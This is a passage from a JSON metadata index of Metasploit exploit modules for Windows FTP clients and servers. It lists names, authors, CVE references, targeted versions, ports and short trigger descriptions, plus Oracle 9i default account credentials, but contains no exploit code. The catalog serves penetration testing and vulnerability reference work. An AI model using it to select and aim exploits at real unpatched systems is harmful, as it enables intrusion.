module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274 The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.", - "references": [ - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpsynch_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/gekkomgr_list_reply": { - "name": "Gekko Manager FTP Client Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/gekkomgr_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "nullthreat", - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. 
If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.", - "references": [ - "OSVDB-68641", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/gekkomgr_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/globalscapeftp_input": { - "name": "GlobalSCAPE Secure FTP Server Input Overflow", - "fullname": "exploit/windows/ftp/globalscapeftp_input", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-05-01", - "type": "exploit", - "author": [ - "Fairuzan Roslan ", - "Mati Aharoni " - ], - "description": "This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n All versions prior to 3.0.3 are affected by this flaw. 
A valid user account (\n or anonymous access) is required for this exploit to work.", - "references": [ - "CVE-2005-1415", - "OSVDB-16049", - "BID-13454", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "GlobalSCAPE Secure FTP Server <= 3.0.2 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/globalscapeftp_input.rb", - "is_install_path": true, - "ref_name": "windows/ftp/globalscapeftp_input", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/goldenftp_pass_bof": { - "name": "GoldenFTP PASS Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/goldenftp_pass_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-01-23", - "type": "exploit", - "author": [ - "Craig Freyman", - "bannedit ", - "Joff Thyer " - ], - "description": "This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. 
By\n default, this option is unchecked.", - "references": [ - "CVE-2006-6576", - "OSVDB-35951", - "BID-45957", - "EDB-16036" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows XP Pro SP3", - "Windows XP Pro SP2", - "Windows XP Pro SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/goldenftp_pass_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/goldenftp_pass_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/httpdx_tolog_format": { - "name": "HTTPDX tolog() Function Format String Vulnerability", - "fullname": "exploit/windows/ftp/httpdx_tolog_format", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-11-17", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a format string vulnerability in HTTPDX FTP server.\n By sending a specially crafted FTP command containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", - "references": [ - "CVE-2009-4769", - "OSVDB-60181" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic Targeting", - "httpdx 1.4 - Windows XP SP3 English", - "httpdx 1.4.5 - Windows XP SP3 English", - "httpdx 1.4.6 - Windows XP SP3 English", - "httpdx 1.4.6b - Windows XP SP3 English", - "httpdx 1.5 - Windows XP SP3 English" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb", - "is_install_path": true, - "ref_name": "windows/ftp/httpdx_tolog_format", - "check": true, - "post_auth": true, - "default_credential": 
false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/kmftp_utility_cwd": { - "name": "Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow", - "fullname": "exploit/windows/ftp/kmftp_utility_cwd", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-23", - "type": "exploit", - "author": [ - "Shankar Damodaran", - "Muhamad Fadzil Ramli " - ], - "description": "This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.\n Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which\n leads to an SEH overflow. Konica FTP allows anonymous access by default; valid\n credentials are typically unnecessary to exploit this vulnerability.", - "references": [ - "CVE-2015-7768", - "EDB-37908" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 7 SP1 x86" - ], - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/exploits/windows/ftp/kmftp_utility_cwd.rb", - "is_install_path": true, - "ref_name": "windows/ftp/kmftp_utility_cwd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/labf_nfsaxe": { - "name": "LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/labf_nfsaxe", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "Tulpa", - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote\n code execution.", - "references": [ - "CVE-2017-18047", - "EDB-42011" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": 
"2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/labf_nfsaxe.rb", - "is_install_path": true, - "ref_name": "windows/ftp/labf_nfsaxe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/leapftp_list_reply": { - "name": "LeapFTP 3.0.1 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/leapftp_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r ", - "nullthreat" - ], - "description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.", - "references": [ - "OSVDB-68640", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/leapftp_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/leapftp_pasv_reply": { - "name": "LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow", - "fullname": "exploit/windows/ftp/leapftp_pasv_reply", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-06-09", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n client that is triggered through an excessively long PASV reply command. 
This\n module was ported from the original exploit by drG4njubas with minor improvements.", - "references": [ - "CVE-2003-0558", - "OSVDB-4587", - "BID-7860", - "EDB-54" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal LeapFTP.exe", - "Windows 2000 SP0/4 English", - "Windows XP SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/leapftp_pasv_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/leapftp_pasv_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ms09_053_ftpd_nlst": { - "name": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow", - "fullname": "exploit/windows/ftp/ms09_053_ftpd_nlst", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-31", - "type": "exploit", - "author": [ - "Kingcope ", - "hdm " - ], - "description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. 
For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)", - "references": [ - "EDB-9541", - "CVE-2009-3023", - "OSVDB-57589", - "BID-36189", - "MSB-MS09-053" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 SP4 English/Italian (IIS 5.0)", - "Windows 2000 SP3 English (IIS 5.0)", - "Windows 2000 SP0-SP3 Japanese (IIS 5.0)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ms09_053_ftpd_nlst", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/netterm_netftpd_user": { - "name": "NetTerm NetFTPD USER Buffer Overflow", - "fullname": "exploit/windows/ftp/netterm_netftpd_user", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-04-26", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a vulnerability in the NetTerm NetFTPD\n application. 
This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.", - "references": [ - "CVE-2005-1323", - "OSVDB-15865", - "URL-https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html", - "BID-13396" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "NetTerm NetFTPD Universal", - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows 2003 English", - "Windows NT 4.0 SP4/SP5/SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/netterm_netftpd_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/netterm_netftpd_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/odin_list_reply": { - "name": "Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)", - "fullname": "exploit/windows/ftp/odin_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "rick2600", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. 
During the overflow,\n a structured exception handler record gets overwritten.", - "references": [ - "OSVDB-68824", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/odin_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/odin_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/open_ftpd_wbem": { - "name": "Open-FTPD 1.2 Arbitrary File Upload", - "fullname": "exploit/windows/ftp/open_ftpd_wbem", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-18", - "type": "exploit", - "author": [ - "Serge Gorbunov", - "bcoles " - ], - "description": "This module exploits multiple vulnerabilities found in Open&Compact FTP\n server. 
The software contains an authentication bypass vulnerability and a\n arbitrary file upload vulnerability that allows a remote attacker to write\n arbitrary files to the file system as long as there is at least one user\n who has permission.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", - "references": [ - "OSVDB-65687", - "EDB-13932", - "CVE-2010-2620" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Open&Compact FTP 1.2 on Windows (Before Vista)" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/ftp/open_ftpd_wbem.rb", - "is_install_path": true, - "ref_name": "windows/ftp/open_ftpd_wbem", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/ftp/oracle9i_xdb_ftp_pass": { - "name": "Oracle 9i XDB FTP PASS Overflow (win32)", - "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_pass", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. 
David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.", - "references": [ - "CVE-2003-0727", - "OSVDB-2449", - "BID-8375", - "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 2100, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Oracle 9.2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/oracle9i_xdb_ftp_pass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/oracle9i_xdb_ftp_unlock": { - "name": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", - "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_unlock", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-08-18", - "type": "exploit", - "author": [ - "MC ", - "David Litchfield " - ], - "description": "By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. 
Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.", - "references": [ - "CVE-2003-0727", - "OSVDB-2449", - "BID-8375", - "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 2100, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Oracle 9.2.0.1 Universal" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb", - "is_install_path": true, - "ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/pcman_put": { - "name": "PCMAN FTP Server Buffer Overflow - PUT Command", - "fullname": "exploit/windows/ftp/pcman_put", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-07", - "type": "exploit", - "author": [ - "Jay Turla", - "Chris Higgins" - ], - "description": "This module exploits a buffer overflow vulnerability found in the PUT command of the\n PCMAN FTP v2.0.7 Server. 
This requires authentication but by default anonymous\n credentials are enabled.", - "references": [ - "CVE-2013-4730", - "EDB-37731", - "OSVDB-94624" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/pcman_put.rb", - "is_install_path": true, - "ref_name": "windows/ftp/pcman_put", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/pcman_stor": { - "name": "PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/pcman_stor", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-27", - "type": "exploit", - "author": [ - "Christian (Polunchis) Ramirez", - "Rick (nanotechz9l) Flores" - ], - "description": "This module exploits a buffer overflow vulnerability found in the STOR command of the\n PCMAN FTP v2.07 Server when the \"/../\" parameters are also sent to the server. Please\n note authentication is required in order to trigger the vulnerability. 
The overflowing\n string will also be seen on the FTP server log console.", - "references": [ - "CVE-2013-4730", - "OSVDB-94624", - "EDB-27703" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/pcman_stor.rb", - "is_install_path": true, - "ref_name": "windows/ftp/pcman_stor", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/proftp_banner": { - "name": "ProFTP 2.9 Banner Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/proftp_banner", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-25", - "type": "exploit", - "author": [ - "His0k4 " - ], - "description": "This module exploits a buffer overflow in the ProFTP 2.9\n client that is triggered through an excessively long welcome message.", - "references": [ - "CVE-2009-3976", - "OSVDB-57394", - "URL-http://www.labtam-inc.com/index.php?act=products&pid=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/proftp_banner.rb", - "is_install_path": true, - "ref_name": "windows/ftp/proftp_banner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/quickshare_traversal_write": { - "name": "QuickShare File Server 1.2.1 Directory Traversal Vulnerability", - "fullname": "exploit/windows/ftp/quickshare_traversal_write", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-02-03", - "type": "exploit", - "author": [ - "modpr0be", - "sinn3r " - ], - "description": "This module exploits 
a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.", - "references": [ - "OSVDB-70776", - "EDB-16105", - "URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html", - "URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "QuickShare File Server 1.2.1" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb", - "is_install_path": true, - "ref_name": "windows/ftp/quickshare_traversal_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ricoh_dl_bof": { - "name": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", - "fullname": "exploit/windows/ftp/ricoh_dl_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-01", - "type": "exploit", - "author": [ - "Julien Ahrens", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\n service. 
By supplying a long string of data to the USER command, it is\n possible to trigger a stack-based buffer overflow, which allows remote code\n execution under the context of the user.\n\n Please note that in order to trigger the vulnerability, the server must\n be configured with a log file name (by default, it's disabled).", - "references": [ - "CVE-2012-5002", - "OSVDB-79691", - "URL-http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/", - "URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ricoh_dl_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/sami_ftpd_list": { - "name": "Sami FTP Server LIST Command Buffer Overflow", - "fullname": "exploit/windows/ftp/sami_ftpd_list", - "aliases": [], - "rank": 100, - "disclosure_date": "2013-02-27", - "type": "exploit", - "author": [ - "superkojiman", - "Doug Prostko " - ], - "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. 
This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.", - "references": [ - "OSVDB-90815", - "BID-58247", - "EDB-24557" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Sami FTP Server 2.0.1 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb", - "is_install_path": true, - "ref_name": "windows/ftp/sami_ftpd_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/sami_ftpd_user": { - "name": "KarjaSoft Sami FTP Server v2.0.2 USER Overflow", - "fullname": "exploit/windows/ftp/sami_ftpd_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-01-24", - "type": "exploit", - "author": [ - "Muhammad Ahmed Siddiqui", - "Critical Security", - "n30m1nd", - "aushack ", - "bcoles " - ], - "description": "This module exploits an unauthenticated stack buffer overflow in\n KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long\n USER string during login.\n\n The payload is triggered when the administrator opens the application\n GUI. If the GUI window is open at the time of exploitation, the\n payload will be executed immediately. Keep this in mind when selecting\n payloads. 
The application will crash following execution of the\n payload and will not restart automatically.\n\n When the application is restarted, it will re-execute the payload\n unless the payload has been manually removed from the SamiFTP.binlog\n log file.\n\n This module has been tested successfully on Sami FTP Server versions:\n 2.0.2 on Windows XP SP0 (x86);\n 2.0.2 on Windows 7 SP1 (x86);\n 2.0.2 on Windows 7 SP1 (x64); and\n 2.0.2 on Windows 10 (1909) (x64).", - "references": [ - "CVE-2006-0441", - "CVE-2006-2212", - "OSVDB-25670", - "BID-16370", - "BID-22045", - "BID-17835", - "EDB-1448", - "EDB-1452", - "EDB-1462", - "EDB-3127", - "EDB-3140", - "EDB-40675" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sami FTP Server version 2.0.2" - ], - "mod_time": "2021-02-25 20:53:30 +0000", - "path": "/modules/exploits/windows/ftp/sami_ftpd_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/sami_ftpd_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/sasser_ftpd_port": { - "name": "Sasser Worm avserve FTP PORT Buffer Overflow", - "fullname": "exploit/windows/ftp/sasser_ftpd_port", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-05-10", - "type": "exploit", - "author": [ - "valsmith ", - "chamuco ", - "aushack " - ], - "description": "This module exploits the FTP server component of the Sasser worm.\n By sending an overly long PORT command the stack can be overwritten.", - "references": [ - "OSVDB-6197" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5554, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP0", - "Windows XP SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/ftp/sasser_ftpd_port.rb", - "is_install_path": true, - "ref_name": "windows/ftp/sasser_ftpd_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/scriptftp_list": { - "name": "ScriptFTP LIST Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/scriptftp_list", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-10-12", - "type": "exploit", - "author": [ - "modpr0be", - "TecR0c ", - "mr_me " - ], - "description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during a FTP LIST command resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and perform arbitrary code execution which allows the attacker to\n gain the same rights as the user running ScriptFTP. 
This vulnerability\n affects versions 3.3 and earlier.", - "references": [ - "CVE-2011-3976", - "OSVDB-75633", - "EDB-17876", - "US-CERT-VU-440219" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows Vista" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/scriptftp_list.rb", - "is_install_path": true, - "ref_name": "windows/ftp/scriptftp_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/seagull_list_reply": { - "name": "Seagull FTP v3.3 Build 409 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/seagull_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. 
If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.", - "references": [ - "OSVDB-94556", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/seagull_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/seagull_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/servu_chmod": { - "name": "Serv-U FTP Server Buffer Overflow", - "fullname": "exploit/windows/ftp/servu_chmod", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-12-31", - "type": "exploit", - "author": [ - "theLightCosine " - ], - "description": "This module exploits a stack buffer overflow in the site chmod command\n in versions of Serv-U FTP Server prior to 4.2.\n\n You must have valid credentials to trigger this vulnerability. 
